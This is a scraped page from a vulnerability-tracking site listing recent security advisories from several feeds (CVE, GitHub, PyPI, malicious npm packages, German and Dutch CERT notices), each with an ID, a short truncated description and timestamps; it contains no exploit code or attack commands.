Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-0108 8.8 (v4.0) 5.9 (v4.0) PAN-OS: Authentication Bypass in the Management Web In… Palo Alto Networks
Cloud NGFW
6 days ago 23 minutes ago
cve-2024-53704 N/A An Improper Authentication vulnerability in the S… SonicWall
SonicOS
1 month ago 24 minutes ago
cve-2025-1464 Baiyi Cloud Asset Management System admin.house.collec… Baiyi
Cloud Asset Management System
53 minutes ago 53 minutes ago
cve-2024-13534 Small Package Quotes – Worldwide Express Edition <= 5.… enituretechnology
Small Package Quotes – Worldwide Express Edition
3 hours ago 3 hours ago
cve-2024-13533 Small Package Quotes – USPS Edition <= 1.3.5 - Unauthe… enituretechnology
Small Package Quotes – USPS Edition
3 hours ago 3 hours ago
cve-2024-13491 Small Package Quotes – For Customers of FedEx <= 4.3.1… enituretechnology
Small Package Quotes – For Customers of FedEx
3 hours ago 3 hours ago
cve-2024-13483 LTL Freight Quotes – SAIA Edition <= 2.2.10 - Unauthen… enituretechnology
LTL Freight Quotes – SAIA Edition
3 hours ago 3 hours ago
cve-2024-13485 LTL Freight Quotes – ABF Freight Edition <= 3.3.7 - Un… enituretechnology
LTL Freight Quotes – ABF Freight Edition
3 hours ago 3 hours ago
cve-2024-13481 LTL Freight Quotes – R+L Carriers Edition <= 3.3.4 - U… enituretechnology
LTL Freight Quotes – R+L Carriers Edition
3 hours ago 3 hours ago
cve-2025-0968 ElementsKit Elementor addons <= 3.4.0 - Unauthenticate… xpeedstudio
ElementsKit Elementor addons
3 hours ago 3 hours ago
cve-2024-13479 LTL Freight Quotes – SEFL Edition <= 3.2.4 - Unauthent… enituretechnology
LTL Freight Quotes – SEFL Edition
3 hours ago 3 hours ago
cve-2024-13478 LTL Freight Quotes – TForce Edition <= 3.6.4 - Unauthe… enituretechnology
LTL Freight Quotes – TForce Edition
3 hours ago 3 hours ago
cve-2025-0916 YaySMTP 2.4.9 - 2.6.2 - Unauthenticated Stored Cross-S… yaycommerce
YaySMTP and Email Logs: Amazon SES, SendGrid, Outlook, Mailgun, Brevo, Google and Any SMTP Service
3 hours ago 3 hours ago
cve-2025-1075 LDAP credentials logged to Apache error log Checkmk GmbH
Checkmk
4 hours ago 4 hours ago
cve-2024-13489 LTL Freight Quotes – Old Dominion Edition <= 4.2.10 - … enituretechnology
LTL Freight Quotes – Old Dominion Edition
5 hours ago 5 hours ago
cve-2025-1135 9.3 (v4.0) SQL Injection in ChurchCRM CurrentFundraiser Parameter… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1134 9.3 (v4.0) SQL Injection in ChurchCRM CurrentFundraiser Parameter… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1133 9.3 (v4.0) SQL Injection in ChurchCRM EID Parameter via EditEvent… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1132 9.3 (v4.0) SQL Injection in ChurchCRM EN_tyid Parameter via EditE… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2024-56000 9.8 (v3.1) WordPress K Elements plugin < 5.4.0 - Unauthenticated … SeventhQueen
K Elements
18 hours ago 5 hours ago
cve-2025-1007 6.9 (v4.0) Improper Authorization in /user/namespace/{namespace}/… Eclipse Foundation
OpenVSX
5 hours ago 5 hours ago
cve-2025-0981 8.4 (v4.0) Session Hijacking via Stored Cross-Site Scripting (XSS… ChurchCRM
ChurchCRM
1 day ago 5 hours ago
cve-2025-1024 8.4 (v4.0) Session Hijacking via Reflected Cross-Site Scripting (… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-0714 6.5 (v3.1) Insecure storage of sensitive information in MobaXTerm… Mobatek
MobaXterm
2 days ago 5 hours ago
cve-2024-13363 Raptive Ads <= 3.6.3 - Reflected Cross-Site Scripting adthrive
Raptive Ads
6 hours ago 6 hours ago
cve-2024-13364 Raptive Ads <= 3.6.3 - Missing Authorization to Unauth… adthrive
Raptive Ads
6 hours ago 6 hours ago
cve-2024-13339 DeBounce Email Validator <= 5.6.6 - Cross-Site Request… debounce
DeBounce Email Validator
6 hours ago 6 hours ago
cve-2024-13336 Disable Auto Updates <= 1.4 - Cross-Site Request Forge… exeebit
Disable Auto Updates
6 hours ago 6 hours ago
cve-2024-13231 WordPress Portfolio Builder – Portfolio Gallery <= 1.1… portfoliohub
WordPress Portfolio Builder – Portfolio Gallery
6 hours ago 6 hours ago
cve-2024-13679 Widget BUY.BOX <= 3.1.5 - Authenticated (Contributor+)… simply4net
Widget BUY.BOX
6 hours ago 6 hours ago
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-0968 ElementsKit Elementor addons <= 3.4.0 - Unauthenticate… xpeedstudio
ElementsKit Elementor addons
3 hours ago 3 hours ago
cve-2025-0916 YaySMTP 2.4.9 - 2.6.2 - Unauthenticated Stored Cross-S… yaycommerce
YaySMTP and Email Logs: Amazon SES, SendGrid, Outlook, Mailgun, Brevo, Google and Any SMTP Service
3 hours ago 3 hours ago
cve-2024-13534 Small Package Quotes – Worldwide Express Edition <= 5.… enituretechnology
Small Package Quotes – Worldwide Express Edition
3 hours ago 3 hours ago
cve-2024-13533 Small Package Quotes – USPS Edition <= 1.3.5 - Unauthe… enituretechnology
Small Package Quotes – USPS Edition
3 hours ago 3 hours ago
cve-2024-13491 Small Package Quotes – For Customers of FedEx <= 4.3.1… enituretechnology
Small Package Quotes – For Customers of FedEx
3 hours ago 3 hours ago
cve-2024-13485 LTL Freight Quotes – ABF Freight Edition <= 3.3.7 - Un… enituretechnology
LTL Freight Quotes – ABF Freight Edition
3 hours ago 3 hours ago
cve-2024-13483 LTL Freight Quotes – SAIA Edition <= 2.2.10 - Unauthen… enituretechnology
LTL Freight Quotes – SAIA Edition
3 hours ago 3 hours ago
cve-2024-13481 LTL Freight Quotes – R+L Carriers Edition <= 3.3.4 - U… enituretechnology
LTL Freight Quotes – R+L Carriers Edition
3 hours ago 3 hours ago
cve-2024-13479 LTL Freight Quotes – SEFL Edition <= 3.2.4 - Unauthent… enituretechnology
LTL Freight Quotes – SEFL Edition
3 hours ago 3 hours ago
cve-2024-13478 LTL Freight Quotes – TForce Edition <= 3.6.4 - Unauthe… enituretechnology
LTL Freight Quotes – TForce Edition
3 hours ago 3 hours ago
cve-2025-1075 LDAP credentials logged to Apache error log Checkmk GmbH
Checkmk
4 hours ago 4 hours ago
cve-2024-13489 LTL Freight Quotes – Old Dominion Edition <= 4.2.10 - … enituretechnology
LTL Freight Quotes – Old Dominion Edition
5 hours ago 5 hours ago
cve-2025-1135 9.3 (v4.0) SQL Injection in ChurchCRM CurrentFundraiser Parameter… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1134 9.3 (v4.0) SQL Injection in ChurchCRM CurrentFundraiser Parameter… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1133 9.3 (v4.0) SQL Injection in ChurchCRM EID Parameter via EditEvent… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1132 9.3 (v4.0) SQL Injection in ChurchCRM EN_tyid Parameter via EditE… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1024 8.4 (v4.0) Session Hijacking via Reflected Cross-Site Scripting (… ChurchCRM
ChurchCRM
5 hours ago 5 hours ago
cve-2025-1007 6.9 (v4.0) Improper Authorization in /user/namespace/{namespace}/… Eclipse Foundation
OpenVSX
5 hours ago 5 hours ago
cve-2025-0981 8.4 (v4.0) Session Hijacking via Stored Cross-Site Scripting (XSS… ChurchCRM
ChurchCRM
1 day ago 5 hours ago
cve-2025-0714 6.5 (v3.1) Insecure storage of sensitive information in MobaXTerm… Mobatek
MobaXterm
2 days ago 5 hours ago
cve-2024-56000 9.8 (v3.1) WordPress K Elements plugin < 5.4.0 - Unauthenticated … SeventhQueen
K Elements
18 hours ago 5 hours ago
cve-2024-13364 Raptive Ads <= 3.6.3 - Missing Authorization to Unauth… adthrive
Raptive Ads
6 hours ago 6 hours ago
cve-2024-13363 Raptive Ads <= 3.6.3 - Reflected Cross-Site Scripting adthrive
Raptive Ads
6 hours ago 6 hours ago
cve-2024-13339 DeBounce Email Validator <= 5.6.6 - Cross-Site Request… debounce
DeBounce Email Validator
6 hours ago 6 hours ago
cve-2024-13336 Disable Auto Updates <= 1.4 - Cross-Site Request Forge… exeebit
Disable Auto Updates
6 hours ago 6 hours ago
cve-2024-13231 WordPress Portfolio Builder – Portfolio Gallery <= 1.1… portfoliohub
WordPress Portfolio Builder – Portfolio Gallery
6 hours ago 6 hours ago
cve-2025-0865 WP Media Category Management 2.0 - 2.3.3 - Cross-Site … debaat
WP Media Category Management
6 hours ago 6 hours ago
cve-2024-13854 Education Addon for Elementor <= 1.3.1 - Authenticated… nicheaddons
Education Addon for Elementor
6 hours ago 6 hours ago
cve-2024-13736 Pure Chat – Live Chat & More! <= 2.31 - Reflected Cros… pure-chat
Pure Chat – Live Chat & More!
6 hours ago 6 hours ago
cve-2024-13719 PeproDev Ultimate Invoice <= 2.0.8 - Insecure Direct O… peprodev
PeproDev Ultimate Invoice
6 hours ago 6 hours ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2025-0968 The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposu… 2 hours ago 2 hours ago
fkie_cve-2025-0916 The YaySMTP and Email Logs: Amazon SES, SendGrid, Outlook, Mailgun, Brevo, Google and Any SMTP Serv… 2 hours ago 2 hours ago
fkie_cve-2024-13534 The Small Package Quotes – Worldwide Express Edition plugin for WordPress is vulnerable to SQL Inje… 2 hours ago 2 hours ago
fkie_cve-2024-13533 The Small Package Quotes – USPS Edition plugin for WordPress is vulnerable to SQL Injection via the… 2 hours ago 2 hours ago
fkie_cve-2024-13491 The Small Package Quotes – For Customers of FedEx plugin for WordPress is vulnerable to SQL Injecti… 2 hours ago 2 hours ago
fkie_cve-2024-13485 The LTL Freight Quotes – ABF Freight Edition plugin for WordPress is vulnerable to SQL Injection vi… 2 hours ago 2 hours ago
fkie_cve-2024-13483 The LTL Freight Quotes – SAIA Edition plugin for WordPress is vulnerable to SQL Injection via the '… 2 hours ago 2 hours ago
fkie_cve-2024-13481 The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to SQL Injection v… 2 hours ago 2 hours ago
fkie_cve-2024-13479 The LTL Freight Quotes – SEFL Edition plugin for WordPress is vulnerable to SQL Injection via the '… 2 hours ago 2 hours ago
fkie_cve-2024-13478 The LTL Freight Quotes – TForce Edition plugin for WordPress is vulnerable to SQL Injection via the… 2 hours ago 2 hours ago
fkie_cve-2025-1075 Insertion of Sensitive Information into Log File in Checkmk GmbH's Checkmk versions <2.3.0p27, <2.2… 4 hours ago 4 hours ago
fkie_cve-2024-13489 The LTL Freight Quotes – Old Dominion Edition plugin for WordPress is vulnerable to SQL Injection v… 4 hours ago 4 hours ago
fkie_cve-2025-1135 A vulnerability exists in ChurchCRM 5.13.0. and prior that allows an attacker to execute arbitrary … 5 hours ago 5 hours ago
fkie_cve-2025-1134 A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary S… 5 hours ago 5 hours ago
fkie_cve-2025-1133 A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary S… 5 hours ago 5 hours ago
fkie_cve-2025-1132 A time-based blind SQL Injection vulnerability exists in the ChurchCRM 5.13.0 and prior EditEventAt… 5 hours ago 5 hours ago
fkie_cve-2025-1024 A vulnerability exists in ChurchCRM 5.13.0 that allows an attacker to execute arbitrary JavaScript … 5 hours ago 5 hours ago
fkie_cve-2025-1007 In OpenVSX version v0.9.0 to v0.20.0, the /user/namespace/{namespace}/details API allows a user to… 5 hours ago 5 hours ago
fkie_cve-2025-0981 A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to hijack a user's ses… 1 day ago 5 hours ago
fkie_cve-2025-0714 The vulnerability exists in the password storage of Mobateks MobaXterm in versions below 25.0. Moba… 2 days ago 5 hours ago
fkie_cve-2024-56000 Incorrect Privilege Assignment vulnerability in SeventhQueen K Elements allows Privilege Escalation… 18 hours ago 5 hours ago
fkie_cve-2024-13364 The Raptive Ads plugin for WordPress is vulnerable to unauthorized access due to a missing capabili… 5 hours ago 5 hours ago
fkie_cve-2024-13363 The Raptive Ads plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'poc' … 5 hours ago 5 hours ago
fkie_cve-2024-13339 The DeBounce Email Validator plugin for WordPress is vulnerable to Cross-Site Request Forgery in al… 5 hours ago 5 hours ago
fkie_cve-2024-13336 The Disable Auto Updates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all ve… 5 hours ago 5 hours ago
fkie_cve-2024-13231 The WordPress Portfolio Builder – Portfolio Gallery plugin for WordPress is vulnerable to unauthori… 5 hours ago 5 hours ago
fkie_cve-2025-0865 The WP Media Category Management plugin for WordPress is vulnerable to Cross-Site Request Forgery i… 6 hours ago 6 hours ago
fkie_cve-2024-13854 The Education Addon for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Refe… 6 hours ago 6 hours ago
fkie_cve-2024-13736 The Pure Chat – Live Chat & More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting… 6 hours ago 6 hours ago
fkie_cve-2024-13719 The PeproDev Ultimate Invoice plugin for WordPress is vulnerable to Insecure Direct Object Referenc… 6 hours ago 6 hours ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-xr45-72jm-wpcw The Small Package Quotes – Worldwide Express Edition plugin for WordPress is vulnerable to SQL Inje… 1 hour ago 1 hour ago
ghsa-wfg6-p4vx-3rfr The LTL Freight Quotes – SEFL Edition plugin for WordPress is vulnerable to SQL Injection via the '… 1 hour ago 1 hour ago
ghsa-h328-hvpc-rxj2 The LTL Freight Quotes – TForce Edition plugin for WordPress is vulnerable to SQL Injection via the… 1 hour ago 1 hour ago
ghsa-fv43-fjwv-823r The YaySMTP and Email Logs: Amazon SES, SendGrid, Outlook, Mailgun, Brevo, Google and Any SMTP Serv… 1 hour ago 1 hour ago
ghsa-c327-jq99-89qx The LTL Freight Quotes – ABF Freight Edition plugin for WordPress is vulnerable to SQL Injection vi… 1 hour ago 1 hour ago
ghsa-8mph-h2q2-6959 The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to SQL Injection v… 1 hour ago 1 hour ago
ghsa-8528-jjpw-q9wx The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposu… 1 hour ago 1 hour ago
ghsa-37r4-cq3r-vf8r The LTL Freight Quotes – SAIA Edition plugin for WordPress is vulnerable to SQL Injection via the '… 1 hour ago 1 hour ago
ghsa-369h-vqqj-7fpr The Small Package Quotes – USPS Edition plugin for WordPress is vulnerable to SQL Injection via the… 1 hour ago 1 hour ago
ghsa-285r-gv6g-mmcm The Small Package Quotes – For Customers of FedEx plugin for WordPress is vulnerable to SQL Injecti… 1 hour ago 1 hour ago
ghsa-rg5f-r5jw-rvxg Insertion of Sensitive Information into Log File in Checkmk GmbH's Checkmk versions <2.3.0p27, <2.2… 1 hour ago 1 hour ago
ghsa-85xx-xv4q-8w2x The LTL Freight Quotes – Old Dominion Edition plugin for WordPress is vulnerable to SQL Injection v… 1 hour ago 1 hour ago
ghsa-264g-h4m4-r2w6 A vulnerability exists in ChurchCRM 5.13.0. and prior that allows an attacker to execute arbitrary … 4 hours ago 4 hours ago
ghsa-w28x-pqqr-4239 The Widget BUY.BOX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin… 4 hours ago 4 hours ago
ghsa-rm88-q26q-5qm2 The WP Media Category Management plugin for WordPress is vulnerable to Cross-Site Request Forgery i… 4 hours ago 4 hours ago
ghsa-qx4j-qqf4-j3ch The Categorized Gallery Plugin plugin for WordPress is vulnerable to SQL Injection via the 'field' … 4 hours ago 4 hours ago
ghsa-prcj-vvj7-6gm4 A vulnerability exists in ChurchCRM 5.13.0 that allows an attacker to execute arbitrary JavaScript … 4 hours ago 4 hours ago
ghsa-pp4c-w5f7-7228 The Pollin plugin for WordPress is vulnerable to SQL Injection via the 'question' parameter in all … 4 hours ago 4 hours ago
ghsa-jrhf-m3h4-v427 The WordPress Portfolio Builder – Portfolio Gallery plugin for WordPress is vulnerable to unauthori… 4 hours ago 4 hours ago
ghsa-jfpc-9686-g9rf The Raptive Ads plugin for WordPress is vulnerable to unauthorized access due to a missing capabili… 4 hours ago 4 hours ago
ghsa-gw2v-7p5h-4fwr A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary S… 4 hours ago 4 hours ago
ghsa-c7vr-vpm2-822g The PeproDev Ultimate Invoice plugin for WordPress is vulnerable to Insecure Direct Object Referenc… 4 hours ago 4 hours ago
ghsa-99x7-g763-hvgw The DeBounce Email Validator plugin for WordPress is vulnerable to Cross-Site Request Forgery in al… 4 hours ago 4 hours ago
ghsa-974c-p7cm-74x8 The Pollin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'question' … 4 hours ago 4 hours ago
ghsa-92h6-5j45-chhw The Cosmic Blocks (40+) Content Editor Blocks Collection plugin for WordPress is vulnerable to Stor… 4 hours ago 4 hours ago
ghsa-8fx2-6c45-vg8j The Education Addon for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Refe… 4 hours ago 4 hours ago
ghsa-7ch8-4hvj-r54q The Pure Chat – Live Chat & More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting… 4 hours ago 4 hours ago
ghsa-7c45-xr3j-vq83 The Raptive Ads plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'poc' … 4 hours ago 4 hours ago
ghsa-6ghc-h6hx-hq7x A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary S… 4 hours ago 4 hours ago
ghsa-4r48-94p2-qwq4 The Disable Auto Updates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all ve… 4 hours ago 4 hours ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
pysec-2024-233 python-jose through 3.3.0 allows attackers to cause a denial of service (resource consumption) duri… 9 months ago 19 hours ago
pysec-2024-232 python-jose through 3.3.0 has algorithm confusion with OpenSSH ECDSA keys and other key formats. Th… 9 months ago 19 hours ago
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform… 5 months ago 23 hours ago
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform… 5 months ago 23 hours ago
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform… 5 months ago 23 hours ago
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform,… 5 months ago 23 hours ago
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 cont… 1 year ago 23 hours ago
pysec-2024-111 A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs versi… 3 months ago 1 day ago
pysec-2024-231 LightGBM Remote Code Execution Vulnerability 3 months ago 4 days ago
pysec-2024-230 Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL cert… 7 months ago 6 days ago
pysec-2024-229 Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulner… 2 months ago 8 days ago
pysec-2024-228 Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution … 2 months ago 8 days ago
pysec-2024-227 Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vulne… 2 months ago 8 days ago
pysec-2024-226 Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A cri… 11 months ago 13 days ago
pysec-2024-225 cryptography is a package designed to expose cryptographic primitives and recipes to Python develop… 11 months ago 13 days ago
pysec-2024-224 Excessive directory permissions in MLflow leads to local privilege escalation when using spark_udf.… 2 months ago 15 days ago
pysec-2024-27 CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI component. After c… 1 year ago 19 days ago
pysec-2019-242 Capstone 3.0.4 has an out-of-bounds vulnerability (SEGV caused by a read memory access) in X86_insn… 5 years ago 21 days ago
pysec-2025-2 uniapi version 1.0.7 introduces code that would execute on import of the module and download a scri… 25 days ago
pysec-2024-223 Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as th… 11 months ago 27 days ago
pysec-2024-222 Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as t… 11 months ago 27 days ago
pysec-2024-221 aiosmtpd is a reimplementation of the Python stdlib smtpd.py based on asyncio. aiosmtpd is vulnerab… 11 months ago 27 days ago
pysec-2024-220 Gradio is an open-source Python package designed for quick prototyping. This vulnerability involves… 4 months ago 30 days ago
pysec-2024-219 Gradio is an open-source Python package designed for quick prototyping. This vulnerability involves… 4 months ago 30 days ago
pysec-2024-218 Gradio is an open-source Python package designed for quick prototyping. This vulnerability involves… 4 months ago 30 days ago
pysec-2024-217 Gradio is an open-source Python package designed for quick prototyping. This is a **data validation… 4 months ago 30 days ago
pysec-2024-216 Gradio is an open-source Python package designed for quick prototyping. This vulnerability is a **l… 4 months ago 30 days ago
pysec-2024-215 Gradio is an open-source Python package designed for quick prototyping. This vulnerability relates … 4 months ago 30 days ago
pysec-2024-214 Gradio is an open-source Python package designed for quick prototyping. This vulnerability relates … 4 months ago 30 days ago
pysec-2024-213 Gradio is an open-source Python package designed for quick prototyping. This vulnerability relates … 4 months ago 30 days ago
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-1280 Malicious code in @symplr-ux/alloy-icons (npm) 9 months ago 9 months ago
mal-2024-1291 Malicious code in shard-packages (npm) 9 months ago 9 months ago
mal-2024-1287 Malicious code in ecs-cdk (npm) 9 months ago 9 months ago
mal-2024-1295 Malicious code in teleport-app-example-node (npm) 9 months ago 9 months ago
mal-2024-1293 Malicious code in swift-docc-rendeeeeeer (npm) 9 months ago 9 months ago
mal-2024-1283 Malicious code in cuckoo-3-web-ui-tooling (npm) 9 months ago 9 months ago
mal-2024-1286 Malicious code in djs-status (npm) 9 months ago 9 months ago
mal-2024-1285 Malicious code in djs-embeds-v2 (npm) 9 months ago 9 months ago
mal-2024-1284 Malicious code in discord-caches (npm) 9 months ago 9 months ago
mal-2024-1296 Malicious code in waveapi (npm) 9 months ago 9 months ago
mal-2024-1290 Malicious code in samplenodejsservice (npm) 9 months ago 9 months ago
mal-2024-1281 Malicious code in arkime (npm) 9 months ago 9 months ago
mal-2024-1288 Malicious code in lambda-iss-location (npm) 9 months ago 9 months ago
mal-2024-1282 Malicious code in blockchain-explorer-api (npm) 9 months ago 9 months ago
mal-2024-1294 Malicious code in tari-explorer (npm) 9 months ago 9 months ago
mal-2024-1289 Malicious code in monitoring-coverage (npm) 9 months ago 9 months ago
mal-2024-1292 Malicious code in sid-client-manager (npm) 9 months ago 9 months ago
mal-2024-1279 Malicious code in djs-log (npm) 10 months ago 10 months ago
mal-2024-1278 Malicious code in somepackage-marksl (npm) 10 months ago 10 months ago
mal-2024-1277 Malicious code in malpac (npm) 10 months ago 10 months ago
mal-2024-1272 Malicious code in @portal-packages/core (npm) 10 months ago 10 months ago
mal-2024-1274 Malicious code in ui-common-components-angular (npm) 10 months ago 10 months ago
mal-2024-1273 Malicious code in metrics-balancer (npm) 10 months ago 10 months ago
mal-2024-1275 Malicious code in @portal-packages/utils (npm) 10 months ago 10 months ago
mal-2024-1276 Malicious code in cz-ifood-conventional-changelog (npm) 10 months ago 10 months ago
mal-2024-1267 Malicious code in commitlint-config-ifood (npm) 10 months ago 10 months ago
mal-2024-1271 Malicious code in web-ar-player (npm) 10 months ago 10 months ago
mal-2024-1269 Malicious code in hosted-lenses-ui (npm) 10 months ago 10 months ago
mal-2024-1270 Malicious code in snap-orca (npm) 10 months ago 10 months ago
mal-2024-1268 Malicious code in bluepurellwalker (npm) 10 months ago 10 months ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2025-0132 Linux Kernel: Schwachstelle ermöglicht Denial of Service 29 days ago 29 days ago
wid-sec-w-2025-0131 OpenSSL: Schwachstelle ermöglicht Offenlegung von Informationen 29 days ago 29 days ago
wid-sec-w-2025-0130 vim: Schwachstelle ermöglicht Denial of Service 29 days ago 29 days ago
wid-sec-w-2025-0129 7-Zip: Schwachstelle ermöglicht Codeausführung 29 days ago 29 days ago
wid-sec-w-2025-0128 Apache CXF: Schwachstelle ermöglicht Denial of Service 29 days ago 29 days ago
wid-sec-w-2025-0123 Red Hat Enterprise Linux und and OpenShift (go-git): Mehrere Schwachstellen 30 days ago 29 days ago
wid-sec-w-2025-0064 Google Chrome / Microsoft Edge: Mehrere Schwachstellen 1 month ago 29 days ago
wid-sec-w-2025-0038 Red Hat Enterprise Linux (iperf): Schwachstelle ermöglicht Denial of Service 1 month ago 29 days ago
wid-sec-w-2025-0020 Google Chrome und Microsoft Edge: Schwachstelle ermöglicht Codeausführung 1 month ago 29 days ago
wid-sec-w-2025-0017 Redis: Mehrere Schwachstellen 1 month ago 29 days ago
wid-sec-w-2024-3630 Python: Schwachstelle ermöglicht Denial of Service 2 months ago 29 days ago
wid-sec-w-2024-3497 Linux Kernel: Mehrere Schwachstellen 3 months ago 29 days ago
wid-sec-w-2024-3463 Python: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 3 months ago 29 days ago
wid-sec-w-2024-3251 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 3 months ago 29 days ago
wid-sec-w-2024-1888 Linux Kernel: Mehrere Schwachstellen 5 months ago 29 days ago
wid-sec-w-2024-1812 Red Hat Enterprise Linux (389-ds-base ldap server): Schwachstelle ermöglicht Denial of Service 6 months ago 29 days ago
wid-sec-w-2024-1761 libTIFF: Schwachstelle ermöglicht Denial of Service 6 months ago 29 days ago
wid-sec-w-2024-1722 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 6 months ago 29 days ago
wid-sec-w-2024-1607 Linux Kernel: Mehrere Schwachstellen 7 months ago 29 days ago
wid-sec-w-2024-1259 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifischen Angriff 8 months ago 29 days ago
wid-sec-w-2024-1235 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe 8 months ago 29 days ago
wid-sec-w-2024-1197 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe 8 months ago 29 days ago
wid-sec-w-2024-1188 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 8 months ago 29 days ago
wid-sec-w-2024-0219 libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service 1 year ago 29 days ago
wid-sec-w-2023-1613 libTIFF: Mehrere Schwachstellen 1 year ago 29 days ago
wid-sec-w-2023-1605 libTIFF: Schwachstelle ermöglicht Denial of Service 1 year ago 29 days ago
wid-sec-w-2023-1514 libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service 1 year ago 29 days ago
wid-sec-w-2023-1479 libTIFF: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 1 year ago 29 days ago
wid-sec-w-2022-1858 Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Denial of Service 2 years ago 29 days ago
wid-sec-w-2022-0451 Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 3 years ago 29 days ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ncsc-2025-0063 Kwetsbaarheid verholpen in PostgreSQL 5 hours ago 5 hours ago
ncsc-2025-0062 Kwetsbaarheid verholpen in Juniper Session Smart Router 23 hours ago 23 hours ago
